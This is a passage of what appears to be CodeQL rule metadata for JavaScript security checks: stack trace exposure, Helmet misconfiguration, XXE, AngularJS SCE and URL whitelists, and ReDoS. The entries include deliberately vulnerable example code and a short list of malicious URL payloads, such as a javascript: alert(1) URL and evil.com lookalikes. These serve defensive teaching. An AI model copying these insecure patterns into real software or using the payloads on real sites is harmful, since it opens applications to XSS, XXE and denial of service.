error log, but remote users will not see the information:\n\n\n```javascript\nvar http = require('http');\n\nhttp.createServer(function onRequest(req, res) {\n  var body;\n  try {\n    body = handleRequest(req);\n  }\n  catch (err) {\n    res.statusCode = 500;\n    res.setHeader(\"Content-Type\", \"text/plain\");\n    log(\"Exception occurred\", err.stack);\n    res.end(\"An exception occurred\"); // OK\n    return;\n  }\n  res.statusCode = 200;\n  res.setHeader(\"Content-Type\", \"application/json\");\n  res.setHeader(\"Content-Length\", body.length);\n  res.end(body);\n}).listen(3000);\n\n```\n\n## References\n* OWASP: [Improper Error Handling](https://owasp.org/www-community/Improper_Error_Handling).\n* Common Weakness Enumeration: [CWE-209](https://cwe.mitre.org/data/definitions/209.html).\n* Common Weakness Enumeration: [CWE-497](https://cwe.mitre.org/data/definitions/497.html).\n"},"properties":{"tags":["security","external/cwe/cwe-209","external/cwe/cwe-497"],"description":"Propagating stack trace information to an external user can\n              unintentionally reveal implementation details that are useful\n              to an attacker for developing a subsequent exploit.","id":"js/stack-trace-exposure","kind":"path-problem","name":"Information exposure through a stack trace","precision":"very-high","problem.severity":"warning","security-severity":"5.4"}},{"id":"js/insecure-helmet-configuration","name":"js/insecure-helmet-configuration","shortDescription":{"text":"Insecure configuration of Helmet security middleware"},"fullDescription":{"text":"The Helmet middleware is used to set security-related HTTP headers in Express applications. This query finds instances where the middleware is configured with important security features disabled."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Insecure configuration of Helmet security middleware\n[Helmet](https://helmetjs.github.io/) is a collection of middleware functions for securing Express apps. It sets various HTTP headers to guard against common web vulnerabilities. This query detects Helmet misconfigurations that can lead to security vulnerabilities, specifically:\n\n* Disabling frame protection\n* Disabling Content Security Policy\nContent Security Policy (CSP) helps spot and prevent injection attacks such as Cross-Site Scripting (XSS). Removing frame protections exposes an application to attacks such as clickjacking, where an attacker can trick a user into clicking on a button or link on a targeted page when they intended to click on the page carrying out the attack.\n\nUsers of the query can extend the set of required Helmet features by adding additional checks for them, using CodeQL [data extensions](https://codeql.github.com/docs/codeql-language-guides/customizing-library-models-for-javascript/) in a [CodeQL model pack](https://docs.github.com/en/code-security/codeql-cli/using-the-advanced-functionality-of-the-codeql-cli/creating-and-working-with-codeql-packs#creating-a-codeql-model-pack). See `CUSTOMIZING.md` in the query source for more information.\n\n\n## Recommendation\nTo help mitigate these vulnerabilities, ensure that the following Helmet functions are not disabled, and are configured appropriately to your application:\n\n* `frameguard`\n* `contentSecurityPolicy`\n\n## Example\nThe following code snippet demonstrates Helmet configured in an insecure manner:\n\n\n```javascript\nconst helmet = require('helmet');\n\napp.use(helmet({\n    frameguard: false,\n    contentSecurityPolicy: false\n}));\n```\nIn this example, the defaults are used, which enables frame protection and a default Content Security Policy.\n\n\n```javascript\napp.use(helmet());\n```\nYou can also enable a custom Content Security Policy by passing an object to the `contentSecurityPolicy` key. For example, taken from the [Helmet docs](https://helmetjs.github.io/#content-security-policy):\n\n\n```javascript\napp.use(\n    helmet({\n        contentSecurityPolicy: {\n            directives: {\n                \"script-src\": [\"'self'\", \"example.com\"],\n                \"style-src\": null,\n            },\n        },\n    })\n);\n```\n\n## References\n* [helmet.js website](https://helmetjs.github.io/)\n* [Content Security Policy (CSP) | MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)\n* [Mozilla Web Security Guidelines](https://infosec.mozilla.org/guidelines/web_security)\n* [Protect against clickjacking | MDN](https://developer.mozilla.org/en-US/docs/Web/Security#protect_against_clickjacking)\n* Common Weakness Enumeration: [CWE-693](https://cwe.mitre.org/data/definitions/693.html).\n* Common Weakness Enumeration: [CWE-1021](https://cwe.mitre.org/data/definitions/1021.html).\n","markdown":"# Insecure configuration of Helmet security middleware\n[Helmet](https://helmetjs.github.io/) is a collection of middleware functions for securing Express apps. It sets various HTTP headers to guard against common web vulnerabilities. This query detects Helmet misconfigurations that can lead to security vulnerabilities, specifically:\n\n* Disabling frame protection\n* Disabling Content Security Policy\nContent Security Policy (CSP) helps spot and prevent injection attacks such as Cross-Site Scripting (XSS). Removing frame protections exposes an application to attacks such as clickjacking, where an attacker can trick a user into clicking on a button or link on a targeted page when they intended to click on the page carrying out the attack.\n\nUsers of the query can extend the set of required Helmet features by adding additional checks for them, using CodeQL [data extensions](https://codeql.github.com/docs/codeql-language-guides/customizing-library-models-for-javascript/) in a [CodeQL model pack](https://docs.github.com/en/code-security/codeql-cli/using-the-advanced-functionality-of-the-codeql-cli/creating-and-working-with-codeql-packs#creating-a-codeql-model-pack). See `CUSTOMIZING.md` in the query source for more information.\n\n\n## Recommendation\nTo help mitigate these vulnerabilities, ensure that the following Helmet functions are not disabled, and are configured appropriately to your application:\n\n* `frameguard`\n* `contentSecurityPolicy`\n\n## Example\nThe following code snippet demonstrates Helmet configured in an insecure manner:\n\n\n```javascript\nconst helmet = require('helmet');\n\napp.use(helmet({\n    frameguard: false,\n    contentSecurityPolicy: false\n}));\n```\nIn this example, the defaults are used, which enables frame protection and a default Content Security Policy.\n\n\n```javascript\napp.use(helmet());\n```\nYou can also enable a custom Content Security Policy by passing an object to the `contentSecurityPolicy` key. For example, taken from the [Helmet docs](https://helmetjs.github.io/#content-security-policy):\n\n\n```javascript\napp.use(\n    helmet({\n        contentSecurityPolicy: {\n            directives: {\n                \"script-src\": [\"'self'\", \"example.com\"],\n                \"style-src\": null,\n            },\n        },\n    })\n);\n```\n\n## References\n* [helmet.js website](https://helmetjs.github.io/)\n* [Content Security Policy (CSP) | MDN](https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/Content-Security-Policy)\n* [Mozilla Web Security Guidelines](https://infosec.mozilla.org/guidelines/web_security)\n* [Protect against clickjacking | MDN](https://developer.mozilla.org/en-US/docs/Web/Security#protect_against_clickjacking)\n* Common Weakness Enumeration: [CWE-693](https://cwe.mitre.org/data/definitions/693.html).\n* Common Weakness Enumeration: [CWE-1021](https://cwe.mitre.org/data/definitions/1021.html).\n"},"properties":{"tags":["security","external/cwe/cwe-693","external/cwe/cwe-1021"],"description":"The Helmet middleware is used to set security-related HTTP headers in Express applications. This query finds instances where the middleware is configured with important security features disabled.","id":"js/insecure-helmet-configuration","kind":"problem","name":"Insecure configuration of Helmet security middleware","precision":"high","problem.severity":"error","security-severity":"7.0"}},{"id":"js/xxe","name":"js/xxe","shortDescription":{"text":"XML external entity expansion"},"fullDescription":{"text":"Parsing user input as an XML document with external entity expansion is vulnerable to XXE attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&amp;` or `&gt;`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n","markdown":"# XML external entity expansion\nParsing untrusted XML files with a weakly configured XML parser may lead to an XML External Entity (XXE) attack. This type of attack uses external entity references to access arbitrary files on a system, carry out denial-of-service (DoS) attacks, or server-side request forgery. Even when the result of parsing is not returned to the user, DoS attacks are still possible and out-of-band data retrieval techniques may allow attackers to steal sensitive data.\n\n\n## Recommendation\nThe easiest way to prevent XXE attacks is to disable external entity handling when parsing untrusted data. How this is done depends on the library being used. Note that some libraries, such as recent versions of `libxml`, disable entity expansion by default, so unless you have explicitly enabled entity expansion, no further action needs to be taken.\n\n\n## Example\nThe following example uses the `libxml` XML parser to parse a string `xmlSrc`. If that string is from an untrusted source, this code may be vulnerable to an XXE attack, since the parser is invoked with the `noent` option set to `true`:\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc, { noent: true });\n});\n\n```\nTo guard against XXE attacks, the `noent` option should be omitted or set to `false`. This means that no entity expansion is undertaken at all, not even for standard internal entities such as `&amp;` or `&gt;`. If desired, these entities can be expanded in a separate step using utility functions provided by libraries such as [underscore](http://underscorejs.org/#unescape), [lodash](https://lodash.com/docs/4.17.15#unescape) or [he](https://github.com/mathiasbynens/he).\n\n\n```javascript\nconst app = require(\"express\")(),\n  libxml = require(\"libxmljs\");\n\napp.post(\"upload\", (req, res) => {\n  let xmlSrc = req.body,\n    doc = libxml.parseXml(xmlSrc);\n});\n\n```\n\n## References\n* OWASP: [XML External Entity (XXE) Processing](https://www.owasp.org/index.php/XML_External_Entity_(XXE)_Processing).\n* Timothy Morgen: [XML Schema, DTD, and Entity Attacks](https://research.nccgroup.com/2014/05/19/xml-schema-dtd-and-entity-attacks-a-compendium-of-known-techniques/).\n* Timur Yunusov, Alexey Osipov: [XML Out-Of-Band Data Retrieval](https://www.slideshare.net/qqlan/bh-ready-v4).\n* Common Weakness Enumeration: [CWE-611](https://cwe.mitre.org/data/definitions/611.html).\n* Common Weakness Enumeration: [CWE-827](https://cwe.mitre.org/data/definitions/827.html).\n"},"properties":{"tags":["security","external/cwe/cwe-611","external/cwe/cwe-827"],"description":"Parsing user input as an XML document with external\n              entity expansion is vulnerable to XXE attacks.","id":"js/xxe","kind":"path-problem","name":"XML external entity expansion","precision":"high","problem.severity":"error","security-severity":"9.1"}},{"id":"js/angular/disabling-sce","name":"js/angular/disabling-sce","shortDescription":{"text":"Disabling SCE"},"fullDescription":{"text":"Disabling strict contextual escaping (SCE) can cause security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n    .config(function($sceProvider) {\n        $sceProvider.enabled(false); // BAD\n    }).controller('controller', function($scope) {\n        // ...\n        $scope.html = '<ul><li>' + item.toString() + '</li></ul>';\n    });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n    .controller('controller', function($scope, $sce) {\n        // ...\n        // GOOD (but should use the templating system instead)\n        $scope.html = $sce.trustAsHtml('<ul><li>' + item.toString() + '</li></ul>'); \n    });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n","markdown":"# Disabling SCE\nAngularJS is secure by default through automated sanitization and filtering of untrusted values that could cause vulnerabilities such as XSS. Strict Contextual Escaping (SCE) is an execution mode in AngularJS that provides this security mechanism.\n\nDisabling SCE in an AngularJS application is strongly discouraged. It is even more discouraged to disable SCE in a library, since it is an application-wide setting.\n\n\n## Recommendation\nDo not disable SCE.\n\n\n## Example\nThe following example shows an AngularJS application that disables SCE in order to dynamically construct an HTML fragment, which is later inserted into the DOM through `$scope.html`.\n\n\n```javascript\nangular.module('app', [])\n    .config(function($sceProvider) {\n        $sceProvider.enabled(false); // BAD\n    }).controller('controller', function($scope) {\n        // ...\n        $scope.html = '<ul><li>' + item.toString() + '</li></ul>';\n    });\n\n```\nThis is problematic, since it disables SCE for the entire AngularJS application.\n\nInstead, just mark the dynamically constructed HTML fragment as safe using `$sce.trustAsHtml`, before assigning it to `$scope.html`:\n\n\n```javascript\nangular.module('app', [])\n    .controller('controller', function($scope, $sce) {\n        // ...\n        // GOOD (but should use the templating system instead)\n        $scope.html = $sce.trustAsHtml('<ul><li>' + item.toString() + '</li></ul>'); \n    });\n\n```\nPlease note that this example is for illustrative purposes only; use the AngularJS templating system to dynamically construct HTML when possible.\n\n\n## References\n* AngularJS Developer Guide: [Strict Contextual Escaping](https://docs.angularjs.org/api/ng/service/$sce)\n* AngularJS Developer Guide: [Can I disable SCE completely?](https://docs.angularjs.org/api/ng/service/$sce#can-i-disable-sce-completely-).\n* Common Weakness Enumeration: [CWE-116](https://cwe.mitre.org/data/definitions/116.html).\n"},"properties":{"tags":["security","maintainability","frameworks/angularjs","external/cwe/cwe-116"],"description":"Disabling strict contextual escaping (SCE) can cause security vulnerabilities.","id":"js/angular/disabling-sce","kind":"problem","name":"Disabling SCE","precision":"very-high","problem.severity":"warning","security-severity":"7.8"}},{"id":"js/angular/double-compilation","name":"js/angular/double-compilation","shortDescription":{"text":"Double compilation"},"fullDescription":{"text":"Recompiling an already compiled part of the DOM can lead to unexpected behavior of directives, performance problems, and memory leaks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(element)(scope); // NOT OK\n    }\n  };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(tooltip)(scope); // OK\n    }\n  };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n","markdown":"# Double compilation\nThe AngularJS compiler processes (parts of) the DOM, determining which directives match which DOM elements, and then applies the directives to the elements. Each DOM element should only be compiled once, otherwise unexpected behavior may result.\n\n\n## Recommendation\nOnly compile new DOM elements.\n\n\n## Example\nThe following example (adapted from the AngularJS developer guide) shows a directive that adds a tooltip to a DOM element, and then compiles the entire element to apply nested directives.\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(element)(scope); // NOT OK\n    }\n  };\n});\n\n```\nThis is problematic, since it will recompile all of `element`, including parts that have already been compiled.\n\nInstead, only the new element should be compiled:\n\n\n```javascript\nangular.module('myapp')\n       .directive('addToolTip', function($compile) {\n  return {\n    link: function(scope, element, attrs) {\n      var tooltip = angular.element('<span ng-show=\"showToolTip\">A tooltip</span>');\n      tooltip.on('mouseenter mouseleave', function() {\n        scope.$apply('showToolTip = !showToolTip');\n      });\n      element.append(tooltip);\n      $compile(tooltip)(scope); // OK\n    }\n  };\n});\n\n```\n\n## References\n* AngularJS Developer Guide: [Double Compilation, and how to avoid it](https://docs.angularjs.org/guide/compiler#double-compilation-and-how-to-avoid-it).\n* Common Weakness Enumeration: [CWE-1176](https://cwe.mitre.org/data/definitions/1176.html).\n"},"properties":{"tags":["reliability","frameworks/angularjs","security","external/cwe/cwe-1176"],"description":"Recompiling an already compiled part of the DOM can lead to\n              unexpected behavior of directives, performance problems, and memory leaks.","id":"js/angular/double-compilation","kind":"problem","name":"Double compilation","precision":"very-high","problem.severity":"warning","security-severity":"8.8"}},{"id":"js/angular/insecure-url-whitelist","name":"js/angular/insecure-url-whitelist","shortDescription":{"text":"Insecure URL whitelist"},"fullDescription":{"text":"URL whitelists that are too permissive can cause security vulnerabilities."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n    .config(function($sceDelegateProvider) {\n        $sceDelegateProvider.resourceUrlWhitelist([\n            \"*://example.org/*\", // BAD\n            \"https://**.example.com/*\", // BAD\n            \"https://example.**\", // BAD\n            \"https://example.*\" // BAD\n        ]);\n    });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n","markdown":"# Insecure URL whitelist\nAngularJS uses filters to ensure that the URLs used for sourcing AngularJS templates and other script-running URLs are safe. One such filter is a whitelist of URL patterns to allow.\n\nA URL pattern that is too permissive can cause security vulnerabilities.\n\n\n## Recommendation\nMake the whitelist URL patterns as restrictive as possible.\n\n\n## Example\nThe following example shows an AngularJS application with whitelist URL patterns that all are too permissive.\n\n\n```javascript\nangular.module('myApp', [])\n    .config(function($sceDelegateProvider) {\n        $sceDelegateProvider.resourceUrlWhitelist([\n            \"*://example.org/*\", // BAD\n            \"https://**.example.com/*\", // BAD\n            \"https://example.**\", // BAD\n            \"https://example.*\" // BAD\n        ]);\n    });\n\n```\nThis is problematic, since the four patterns match the following malicious URLs, respectively:\n\n* `javascript://example.org/a%0A%0Dalert(1)` (`%0A%0D` is a linebreak)\n* `https://evil.com/?ignore=://example.com/a`\n* `https://example.evil.com`\n* `https://example.evilTld`\n\n## References\n* OWASP/Google presentation: [Securing AngularJS Applications](https://www.owasp.org/images/6/6e/Benelus_day_20161125_S_Lekies_Securing_AngularJS_Applications.pdf)\n* AngularJS Developer Guide: [Format of items in resourceUrlWhitelist/Blacklist](https://docs.angularjs.org/api/ng/service/$sce#resourceUrlPatternItem).\n* Common Weakness Enumeration: [CWE-183](https://cwe.mitre.org/data/definitions/183.html).\n* Common Weakness Enumeration: [CWE-625](https://cwe.mitre.org/data/definitions/625.html).\n"},"properties":{"tags":["security","frameworks/angularjs","external/cwe/cwe-183","external/cwe/cwe-625"],"description":"URL whitelists that are too permissive can cause security vulnerabilities.","id":"js/angular/insecure-url-whitelist","kind":"problem","name":"Insecure URL whitelist","precision":"very-high","problem.severity":"warning","security-severity":"7.5"}},{"id":"js/redos","name":"js/redos","shortDescription":{"text":"Inefficient regular expression"},"fullDescription":{"text":"A regular expression that requires exponential time to match certain inputs can be a performance bottleneck, and may be vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"error"},"help":{"text":"# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n","markdown":"# Inefficient regular expression\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this regular expression:\n\n```javascript\n\n/^_(__|.)+_$/\n```\nIts sub-expression `\"(__|.)+?\"` can match the string `\"__\"` either by the first alternative `\"__\"` to the left of the `\"|\"` operator, or by two repetitions of the second alternative `\".\"` to the right. Thus, a string consisting of an odd number of underscores followed by some other character will cause the regular expression engine to run for an exponential amount of time before rejecting the input.\n\nThis problem can be avoided by rewriting the regular expression to remove the ambiguity between the two branches of the alternative inside the repetition:\n\n```javascript\n\n/^_(__|[^_])+_$/\n```\n\n## References\n* OWASP: [Regular expression Denial of Service - ReDoS](https://www.owasp.org/index.php/Regular_expression_Denial_of_Service_-_ReDoS).\n* Wikipedia: [ReDoS](https://en.wikipedia.org/wiki/ReDoS).\n* Wikipedia: [Time complexity](https://en.wikipedia.org/wiki/Time_complexity).\n* James Kirrage, Asiri Rathnayake, Hayo Thielecke: [Static Analysis for Regular Expression Denial-of-Service Attack](https://arxiv.org/abs/1301.0849).\n* Common Weakness Enumeration: [CWE-1333](https://cwe.mitre.org/data/definitions/1333.html).\n* Common Weakness Enumeration: [CWE-730](https://cwe.mitre.org/data/definitions/730.html).\n* Common Weakness Enumeration: [CWE-400](https://cwe.mitre.org/data/definitions/400.html).\n"},"properties":{"tags":["security","external/cwe/cwe-1333","external/cwe/cwe-730","external/cwe/cwe-400"],"description":"A regular expression that requires exponential time to match certain inputs\n              can be a performance bottleneck, and may be vulnerable to denial-of-service\n              attacks.","id":"js/redos","kind":"problem","name":"Inefficient regular expression","precision":"high","problem.severity":"error","security-severity":"7.5"}},{"id":"js/polynomial-redos","name":"js/polynomial-redos","shortDescription":{"text":"Polynomial regular expression used on uncontrolled data"},"fullDescription":{"text":"A regular expression that can require polynomial time to match may be vulnerable to denial-of-service attacks."},"defaultConfiguration":{"enabled":true,"level":"warning"},"help":{"text":"# Polynomial regular expression used on uncontrolled data\nSome regular expressions take a long time to match certain input strings to the point where the time it takes to match a string of length *n* is proportional to *n<sup>k</sup>* or even *2<sup>n</sup>*. Such regular expressions can negatively affect performance, or even allow a malicious user to perform a Denial of Service (\"DoS\") attack by crafting an expensive input string for the regular expression to match.\n\nThe regular expression engines provided by many popular JavaScript platforms use backtracking non-deterministic finite automata to implement regular expression matching. While this approach is space-efficient and allows supporting advanced features like capture groups, it is not time-efficient in general. The worst-case time complexity of such an automaton can be polynomial or even exponential, meaning that for strings of a certain shape, increasing the input length by ten characters may make the automaton about 1000 times slower.\n\nTypically, a regular expression is affected by this problem if it contains a repetition of the form `r*` or `r+` where the sub-expression `r` is ambiguous in the sense that it can match some string in multiple ways. More information about the precise circumstances can be found in the references.\n\n\n## Recommendation\nModify the regular expression to remove the ambiguity, or ensure that the strings matched with the regular expression are short enough that the time-complexity does not matter.\n\n\n## Example\nConsider this use of a regular expression, which removes all leading and trailing whitespace in a string:\n\n```javascript\n\ntext.replace(/^\\s+|\\s+$/g, ''); // BAD\n```\nThe sub-expression `\"\\s+$\"` will match the whitespace characters in `text` from left to right, but it can start matching anywhere within a whitespace sequence. This is problematic for strings that do **not** end with a whitespace character. Such a string will force the regular expression engine to process each whitespace sequence once per whitespace character in the sequence.\n\nThis ultimately means that the time cost of trimming a string is quadratic in the length of the string. So a string like `\"a b\"` will take milliseconds to process, but a similar string with a million spaces instead of just one will take several minutes.\n\nAvoid this problem by rewriting the regular expression to not contain the ambiguity about when to start matching whitespace sequences. For instance, by using a negative look-behind (`/^\\s+|(?<!\\s)\\s+$/g`), or just by using the built-in trim method (`text.trim()`).\n\nNote that the sub-expression `\"^\\s+\"` is **not** problematic as the `^` anchor restricts when that sub-expression can start matching, and as the regular expression engine matches from left to right.\n\n\n## Example\nAs a similar, but slightly subtler problem, consider the regular expression that matches lines with numbers, possibly written using scientific notation:\n\n```javascript\n\n/^0\\.\\d+E?\\d+$/.test(str) // BAD\n```\nThe problem with this regular expression is in the sub-expression `\\d+E?\\d+` because the second `\\d+` can start matching digits anywhere after the first match of the first `\\d+` if there is no `E` in the input string.\n\nThis is problematic for strings that do **not** end with a digit. Such a string will force the regular expression engine to process each digit sequence once per digit in the sequence, again leading to a quadratic time complexity.\n\nTo make the processing faster, the regular expression should be rewritten such that the two `\\d+` sub-expressions do not have overlapping matches: `^0\\.\\d+(E\\d+)?$`.\n\n\n## Example\nSometimes it is unclear how a regular expression can be rewritten to avoid the problem. In such cases, it often suffices to limit the length of the input string. For instance, the following regular expression is used to match numbers, and on some non-number inputs it can have quadratic time complexity:\n\n```javascript\n\n/^(\\+|-)?(\\d+|(\\d*\\.\\d*))?(E|e)?([-+])?(\\d+)?$/.test(str) // BAD\n```\nIt is not immediately obvious how to rewrite this regular expression to avoid the problem. However, you can mitigate performance issues by limiting the length to 1000 characters, which will always finish in a reasonable amount of time.\n\n```javascript\n\nif (str.length > 1000) {\n    throw new Error(\"Input too 